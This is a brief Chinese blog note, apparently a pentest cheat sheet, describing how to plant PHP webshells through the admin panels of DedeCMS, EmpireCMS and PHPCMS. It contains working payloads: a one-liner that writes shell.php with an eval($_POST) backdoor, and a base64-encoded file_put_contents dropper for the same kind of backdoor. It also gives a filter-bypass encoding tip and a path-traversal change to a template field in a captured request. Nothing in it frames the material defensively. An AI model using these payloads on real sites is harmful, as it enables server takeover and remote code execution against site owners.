1. dedecms方法
文件上传(分为图片上传或者文件管理器上传)
文件包含漏洞,在模块管理中将一句话插入到html的文件中(优先为文件主页)
也可以在核心设置中插入一句话,从而将一句话插入到data\config.cache.inc.php中。
2. 帝国cms方法(mpirecms)
该cms后台有个自定义页面选项(后台地图中寻找),输入页面名称,然后将代码写入页面内容即可。如果该网站转义',那么可以用:
1 <?php fputs(fopen("shell.php","a"),'<php phpinfo();eval($_POST['chopper']); ?>')?>。
注意php中单双引号,双引号串中的内容可以被解释而且替换,而单引号串中的内容总被认为是普通字符。
如果网站开启了过滤,那么可以考虑编码绕过:
1 <?php base64_decode("编码后的攻击代码"); ?>
注意base64的加密问题: Base64 空格,加号问题 - hongdada - 博客园 (cnblogs.com)
3. phpcms后台拿webshell
在内容-专题栏中新建专题。在专题导读中插入写马代码,注意记住专题的生成目录。然后再随便生成一个专题,在生成该专题的时候,抓包,将index_template&5D的内容改成
../../../../html/special/写马时的专题名/index(其实改的就是扩展设置中专题模板那一栏中的专题首页。
该目录的查找可以通过查看专题主页,即可看到。
<?php file_put_contents('moon.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW21vb25dKTs/Pg==')); ?>
随后网站根目录就会生成shell,直接连接就行。
浙公网安备 33010602011771号